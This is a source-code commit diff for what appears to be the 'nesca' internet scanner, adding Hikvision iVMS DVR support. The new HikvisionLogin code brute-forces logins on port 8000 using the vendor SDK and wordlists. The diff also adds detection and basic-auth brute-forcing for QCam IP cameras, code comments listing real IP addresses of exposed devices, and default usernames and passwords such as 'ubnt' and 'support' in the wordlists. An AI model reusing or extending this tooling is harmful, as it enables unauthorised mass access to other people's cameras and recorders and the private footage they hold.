Hikvision iVMS support added (Windows only)

Connector.cpp

@@ -106,10 +106,6 @@ int my_trace(CURL *handle, curl_infotype type,
   return 0;
 }
 
-//struct MemoryStruct {
-//	char *memory;
-//	size_t size;
-//};
 size_t nWriteCallback(void *contents, size_t size, size_t nmemb, void *userp)
 {
 	size_t realsize = size * nmemb;
@@ -141,16 +137,9 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
                         const std::string *lpString,
 						bool digestMode){
 	buffer->clear();
-	//buffer->reserve(100000);
 	int res = 0;
 	CURL *curl = curl_easy_init();
 
-	//struct MemoryStruct chunk;
-
-	//chunk.memory = (char*)malloc(1);  /* will be grown as needed by the realloc above */
-	//chunk.size = 0;    /* no data at this point */
-	//std::string buffer2;
-
 	if (curl != NULL)
 	{
 		curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
@@ -200,11 +189,6 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
 				curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
 				res = curl_easy_perform(curl);
 				
-				//if (chunk.size > 0){
-				//	//buffer2 = std::string(chunk.memory);
-				//	buffer->append(chunk.memory, chunk.size);
-				//}
-
 				if (port != 21 && lpString != NULL) {
 					int pos = Utils::ustrstr(*buffer, "\r\n\r\n");
 					if (pos != -1) {
@@ -216,33 +200,29 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
 		}
 		else res = curl_easy_perform(curl);
 		
-		//if (chunk.size > 0){
-		//	//buffer2 = std::string(chunk.memory);
-		//	buffer->append(chunk.memory, chunk.size);
-		//}
-
-		
+		int sz = buffer->size();
 		if (res == CURLE_OK || 
-			(port == 21 && buffer->size() > 0)) {
+			(port == 21 && sz > 0)) {
 			if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
-			Activity += buffer->size();
+			Activity += sz;
 
 			curl_easy_cleanup(curl);
-            return buffer->size();
+			return sz;
 		} else {
-
 			curl_easy_cleanup(curl);
 			if (res == 6) return -2;
+			if (res == 56 && port == 8000) return 1;														//Hikvision
 			else if (res != 28 &&
 				res != 7 &&
 				res != 13 &&
 				res != 67 &&
 				res != 52 &&
-				res != 55 &&
 				res != 56 &&
+				res != 55 &&
 				res != 35 &&
 				res != 19 &&
-                res != 23) {
+                res != 23) 
+			{
 				if (res == 5) {
 					stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. ");
 					return -2;
@@ -260,202 +240,21 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
 				}
 				else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + 
 					QString(ip) + ":" + QString::number(port));
-			}
+			} else return sz;
 			
-            if(res == 23 && buffer->size() > 0) {
-                if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString("[OVERFLOW]"));
-                return buffer->size();
-            } else return -1;
+			if (res == 23 && sz > 0) {
+				return sz;
+			}
+			else return -1;
 		}
 
 		if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
-		return buffer->size();
+		return sz;
     } else {
         stt->doEmitionRedFoundData("Curl error.");
         return -1;
 	};
 }
-// 
-//int Connector::nConnect2(const char* ip, const int port, std::string *buffer,
-//	const char *postData,
-//	const std::vector<std::string> *customHeaders,
-//	const std::string *lpString,
-//	bool digestMode)
-//{
-//	buffer->clear();
-//
-//	int still_running;
-//	struct timeval timeout;
-//	int res = 0;
-//	CURL *curl = curl_easy_init();
-//
-//	if (curl != NULL)
-//	{
-//		curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
-//		if (MapWidgetOpened) {
-//			struct data config;
-//			config.trace_ascii = 1; /* enable ascii tracing */
-//			curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace);
-//			curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config);
-//			curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
-//		}
-//		curl_easy_setopt(curl, CURLOPT_URL, ip);
-//		curl_easy_setopt(curl, CURLOPT_PORT, port);
-//		curl_easy_setopt(curl, CURLOPT_USERAGENT,
-//			"Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0");
-//		curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
-//		curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L);
-//		curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
-//		curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
-//		curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
-//		curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
-//		int proxyPort = std::atoi(gProxyPort);
-//		if (strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
-//			curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
-//			curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
-//		}
-//		else {
-//			curl_easy_setopt(curl, CURLOPT_PROXY, "");
-//		}
-//		curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
-//		curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
-//		curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
-//
-//		if (postData != NULL) curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData);
-//
-//		if (customHeaders != NULL) {
-//			struct curl_slist *chunk = NULL;
-//			for (auto &ch : *customHeaders) chunk = curl_slist_append(chunk, ch.c_str());
-//			curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk);
-//		}
-//		
-//		if (lpString != NULL) {
-//			curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L);
-//			curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L);
-//			curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
-//			if (digestMode) curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
-//		}
-//
-//
-//		CURLM *multi_handle = curl_multi_init();
-//		if (multi_handle == NULL) stt->doEmitionRedFoundData("curl_multi_init == NULL!");
-//		curl_multi_add_handle(multi_handle, curl);
-//
-//		do { res = curl_multi_perform(multi_handle, &still_running); }
-//		while (res == CURLM_CALL_MULTI_PERFORM);
-//
-//		while (still_running) {
-//			fd_set fdread;
-//			fd_set fdwrite;
-//			fd_set fdexcep;
-//			int maxfd = -1;
-//			
-//			FD_ZERO(&fdread);
-//			FD_ZERO(&fdwrite);
-//			FD_ZERO(&fdexcep);
-//			
-//			timeout.tv_sec = gTimeOut;
-//			timeout.tv_usec = 0;
-//			
-//			curl_multi_fdset(multi_handle, &fdread, &fdwrite, &fdexcep, &maxfd);
-//
-//#ifdef _WIN32
-//			Sleep(100);
-//#else
-//			struct timeval wait = { 0, 100 * 1000 }; /* 100ms */
-//			rc = select(0, NULL, NULL, NULL, &wait);
-//#endif
-//
-//			/* get file descriptors from the transfers */
-//			switch (select(maxfd + 1, &fdread, &fdwrite, &fdexcep, &timeout)) {
-//			case -1:
-//				/* select error */
-//				still_running = 0;
-//				stt->doEmitionRedFoundData("select() returns error, this is badness");
-//				break;
-//			case 0:
-//			default:
-//				/* timeout or readable/writable sockets */
-//				do
-//				{
-//					res = curl_multi_perform(multi_handle, &still_running);
-//				} while (res == CURLM_CALL_MULTI_PERFORM);
-//				break;
-//			}
-//		}
-//
-//		curl_multi_remove_handle(multi_handle, curl);
-//		curl_multi_cleanup(multi_handle);
-//		curl_easy_cleanup(curl);
-//
-//		if (res == CURLE_OK ||
-//			(port == 21 && buffer->size() > 0)) {
-//
-//			if (digestMode)
-//			{
-//				if (port != 21 && lpString != NULL) {
-//					int pos = Utils::ustrstr(*buffer, "\r\n\r\n");
-//					if (pos != -1) {
-//						*buffer = buffer->substr(pos + 4);
-//					}
-//				}
-//			}
-//
-//			if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
-//			Activity += buffer->size();
-//			return buffer->size();
-//		}
-//		else {
-//			if (res == 6) return -2;
-//			else if (res != 28 &&
-//				res != 7 &&
-//				res != 67 &&
-//				res != 52 &&
-//				res != 55 &&
-//				res != 56 &&
-//				res != 35 &&
-//				res != 19 &&
-//				res != 23) {
-//				if (res == 5) {
-//					stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. ");
-//					return -2;
-//				}
-//				else if (res == 13) {
-//					stt->doEmitionFoundData("Unknown ftp. (" + QString::number(res) + ") " +
-//						QString(ip) + ":" + QString::number(port));
-//					return -2;
-//				}
-//				else if (res == 8) {
-//					stt->doEmitionFoundData("Strange ftp reply. (" +
-//						QString::number(res) + ") " + QString(ip) +
-//						":" + QString::number(port));
-//					return -2;
-//				}
-//				else if (res == 18) {
-//					stt->doEmitionFoundData("Inappropriate file size. (" +
-//						QString::number(res) + ") " + QString(ip) +
-//						":" + QString::number(port));
-//					return -2;
-//				}
-//				else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " +
-//					QString(ip) + ":" + QString::number(port));
-//			}
-//
-//			if (res == 23 && buffer->size() > 0) {
-//				if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString("[OVERFLOW]"));
-//				return buffer->size();
-//			}
-//			else return -1;
-//		}
-//
-//		if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
-//		return buffer->size();
-//	}
-//	else {
-//		stt->doEmitionRedFoundData("Curl error.");
-//		return -1;
-//	};
-//}
 
 int Connector::connectToPort(char* ip, int port)
 {
@@ -467,7 +266,7 @@ int Connector::connectToPort(char* ip, int port)
     std::string buffer;
     int size = 0;
 
-    if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer);
+	if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer);			//SSH
     else size = nConnect(ip, port, &buffer);
 
     if(size > 0)

HikvisionLogin.cpp

@@ -0,0 +1,62 @@
+#include "HikvisionLogin.h"
+#include "externData.h"
+#include "FileUpdater.h"
+
+bool HikVis::isInitialized = false;
+
+void HikVis::hikInit(){
+	//hik_init_ptr();
+}
+
+void HikVis::hikCleanup(){
+	//hik_cleanup_ptr();
+}
+
+lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) 
+{
+	lopaStr lps = { "UNKNOWN", "", "" };
+	int passCounter = 0;
+
+	for (int i = 0; i < MaxLogin; ++i) {
+		for (int j = 0; j < MaxPass; ++j) {
+			FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
+			if (!globalScanFlag) return lps;
+
+			NET_DVR_DEVICEINFO_V30 *info;
+			hik_init_ptr();
+			if (hik_login_ptr(sDVRIP, wDVRPort, loginLst[i], passLst[j], info) == 0) {
+				strcpy(lps.login, loginLst[i]);
+				strcpy(lps.pass, passLst[j]);
+				hik_cleanup_ptr();
+				return lps;
+			}
+			hik_cleanup_ptr();
+
+			if (BALogSwitched) stt->doEmitionBAData("HV: " + QString(sDVRIP) + ":" + QString::number(wDVRPort) +
+				"; l/p: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + ";	- Progress: (" +
+				QString::number((++passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
+
+			Sleep(100);
+		}
+	}
+
+	return lps;
+}
+
+lopaStr HikVis::HVLobby(const char *ip, const int port) {
+	if (gMaxBrutingThreads > 0) {
+
+		while (BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
+
+		++baCount;
+		++BrutingThrds;
+		const lopaStr &lps = hikLogin(ip, port);
+		--BrutingThrds;
+
+		return lps;
+	}
+	else {
+		lopaStr lps = { "UNKNOWN", "", "" };
+		return lps;
+	}
+}

HikvisionLogin.h

@@ -0,0 +1,25 @@
+#ifndef HIKVISIONLOGIN_H
+#define HIKVISIONLOGIN_H
+
+#include "STh.h"
+#include "mainResources.h"
+
+class HikVis {
+public: static bool isInitialized;
+
+private: lopaStr hikLogin(const char * sDVRIP, int wDVRPort);
+
+public:
+	HikVis(){
+		hikInit();
+	}
+	~HikVis(){
+		hikCleanup();
+	}
+
+	void hikInit();
+	void hikCleanup();
+	lopaStr HVLobby(const char *ip, const int port);
+};
+
+#endif // UTILS_H

externFunctions.h

@@ -1,6 +1,8 @@
 #ifndef EF_H
 #define EF_H
 
+#include <string>
+
 extern std::string toLowerStr(const char *str);
 extern char* strstri(const char *_Str, const char *_SubStr);
 

finder.cpp

@@ -11,6 +11,7 @@
 #include "FileUpdater.h"
 #include "IPCAuth.h"
 #include <qjsonobject.h>
+#include "HikvisionLogin.h"
 
 unsigned char tl(unsigned char d)
 {
@@ -395,6 +396,9 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
 		&& Utils::ustrstr(buffcpy, "jsmain/liveview.js") != -1
 		)																				return 54; //Beward (http://46.146.243.88:88/login.asp)
 
+	if (Utils::ustrstr(buffcpy, "get_status.cgi") != -1
+		&& Utils::ustrstr(buffcpy, "str_device+") != -1)								return 55; //QCam (http://1.177.123.118:8080/)
+
     if(((Utils::ustrstr(buffcpy, "220") != -1) && (port == 21)) ||
         (Utils::ustrstr(buffcpy, "220 diskStation ftp server ready") != -1) ||
         (Utils::ustrstr(buffcpy, "220 ftp server ready") != -1)
@@ -2334,7 +2338,18 @@ int Lexems::header(char *ip, int port, const char *str, Lexems *l, PathStr *ps,
 
 int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lexems *lx)
 {
-	if (port == 22)
+	if (HikVis::isInitialized && port == 8000) {
+		HikVis hv;
+		lopaStr lps = hv.HVLobby(ip, port);
+		if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
+		{
+			_specFillerBA(ip, port, "[Hikvision] iVMS client required.", lps.login, lps.pass, 0);
+			fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision] iVMS client required ().", 
+				lps.login, lps.pass, "[Hikvision] iVMS", "UTF-8", "Basic Authorization");
+			return -1;
+		};
+	}
+	else if (port == 22)
 	{
 		_saveSSH(ip, 22, size, buffcpy->c_str());
 		return -1;
@@ -2603,6 +2618,10 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex
 	{
 		_specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD");
 	}
+	else if (flag == 55) //QCam
+	{
+		_specBrute(ip, port, "IP Camera", flag, "/videostream.cgi", "Basic Authorization", cp, size);
+	}
 	else if (flag == 20) //AXIS Camera
 	{
 		if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) {

login.txt

@@ -2,6 +2,7 @@ admin
 root
 123123
 123456
+support
 12345
 
 cisco
@@ -31,3 +32,4 @@ cgadmin
 777777
 555555
 111222333
+ubnt

mainResources.h

@@ -1,4 +1,4 @@
-#pragma once
+#pragma once
 #include "base64.h"
 
 #include <libssh/libssh.h>
@@ -90,6 +90,28 @@ typedef int					BOOL;
 #define MAX_ADDR_LEN 128
 #endif
 
+struct NET_DVR_DEVICEINFO_V30
+{
+	unsigned char sSerialNumber; //序列号
+	unsigned char byAlarmInPortNum; //报警输入个数
+	unsigned char byAlarmOutPortNum; //报警输出个数
+	unsigned char byDiskNum; //硬盘个数
+	unsigned char byDVRType; //设备类型, 1:DVR 2:ATM DVR 3:DVS ......
+	unsigned char byChanNum; //模拟通道个数
+	unsigned char byStartChan; //起始通道号,例如DVS-1,DVR - 1
+	unsigned char byAudioChanNum; //语音通道数
+	unsigned char byIPChanNum; //最大数字通道个数
+	unsigned char byZeroChanNum; //零通道编码个数 //2010-01-16
+	unsigned char byMainProto; //主码流传输协议类型 0-private, 1-rtsp
+	unsigned char bySubProto; //子码流传输协议类型0-private, 1-rtsp
+	unsigned char bySupport; //能力，位与结果为0表示不支持，1表示支持，
+	unsigned char bySupport1; // 能力集扩充，位与结果为0表示不支持，1表示支持
+	unsigned char byRes1;
+	int wDevType; //设备型号
+
+	unsigned char byRes2; //保留
+};
+
 struct PathStr{
 	char codepage[32];
 	char headr[TITLE_MAX_SIZE];
@@ -136,3 +158,17 @@ public:
         int size,
         Lexems *lx);
 };
+
+//Hikvision SDK extern functions
+//typedef int(__stdcall *f_func)();
+typedef void(__stdcall *NET_DVR_Init)();
+typedef void(__stdcall *NET_DVR_Cleanup)();
+typedef int(__stdcall *NET_DVR_Login_V30)(const char * sDVRIP,
+	int wDVRPort,
+	const char * sUserName,
+	const char * sPassword,
+	NET_DVR_DEVICEINFO_V30 *lpDeviceInfo);
+
+extern NET_DVR_Init hik_init_ptr;
+extern NET_DVR_Cleanup hik_cleanup_ptr;
+extern NET_DVR_Login_V30 hik_login_ptr;

negatives.txt

@@ -1,3 +1,6 @@
+Analog Telephone Adapter
+IP Dect -
+AnyGate
 Unable to open
 WebDAV
 Ruckus Wireless

nesca_3.cpp

@@ -16,6 +16,11 @@
 #include <qmessagebox.h>
 #include "progressbardrawer.h"
 #include "FileDownloader.h"
+#include "HikvisionLogin.h"
+
+NET_DVR_Init hik_init_ptr = NULL;
+NET_DVR_Cleanup hik_cleanup_ptr = NULL;
+NET_DVR_Login_V30 hik_login_ptr = NULL;
 
 QDate date = QDate::currentDate();
 int ver = 100*(100*(date.year()%100) + date.month()) + date.day();
@@ -2929,6 +2934,41 @@ QString GetColorCode(int mode, QString str)
 	return result;
 }
 
+void enableHikvisionSupport(){
+	HINSTANCE hGetProcIDDLL = LoadLibrary(L".\\HCNetSDK.dll");
+
+	if (!hGetProcIDDLL) {
+		HikVis::isInitialized = false;
+		stt->doEmitionRedFoundData("Could not load HCNetSDK.dll! Hikvision support disabled.");
+		return;
+	}
+
+	hik_init_ptr = (NET_DVR_Init)GetProcAddress(hGetProcIDDLL, "NET_DVR_Init");
+	if (!hik_init_ptr) {
+		HikVis::isInitialized = false;
+		stt->doEmitionRedFoundData("Could not locate hikInit()! Hikvision support disabled.");
+		return;
+	}
+
+	hik_login_ptr = (NET_DVR_Login_V30)GetProcAddress(hGetProcIDDLL, "NET_DVR_Login_V30");
+	if (!hik_login_ptr) {
+		HikVis::isInitialized = false;
+		stt->doEmitionRedFoundData("Could not locate hikLogin()! Hikvision support disabled.");
+		return;
+	}
+
+	hik_cleanup_ptr = (NET_DVR_Cleanup)GetProcAddress(hGetProcIDDLL, "NET_DVR_Cleanup");
+	if (!hik_cleanup_ptr) {
+		HikVis::isInitialized = false;
+		stt->doEmitionRedFoundData("Could not locate hikCleanup()! Hikvision support disabled.");
+		return;
+	}
+
+	HikVis::isInitialized = true;
+	stt->doEmitionGreenFoundData("Hikvision support enabled.");
+}
+
+
 nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent)
 {
 	setWindowFlags(Qt::FramelessWindowHint);
@@ -2991,6 +3031,7 @@ nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent)
 	};
 #endif
 
+		
 	std::thread fuThread(FileDownloader::checkWebFiles);
 	fuThread.detach();
 
@@ -2998,6 +3039,12 @@ nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent)
 	_startMsgCheck();
 	qrp.setMinimal(true);
 	drawVerboseArcs(0);
+
+	//[5.39.163.202] 8000 (? ) open
+
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+	enableHikvisionSupport();
+#endif
 }
 
 nesca_3::~nesca_3()

pass.txt

@@ -17,6 +17,7 @@ qwerty
 meinsm
 monitor
 user
+support
 test
 sysadm
 admin123
@@ -55,3 +56,4 @@ fujiyama
 super
 P@ssw0rd
 passw0rd
+ubnt

version

@@ -1 +1 @@
-24B99-78C
+24B9C-72B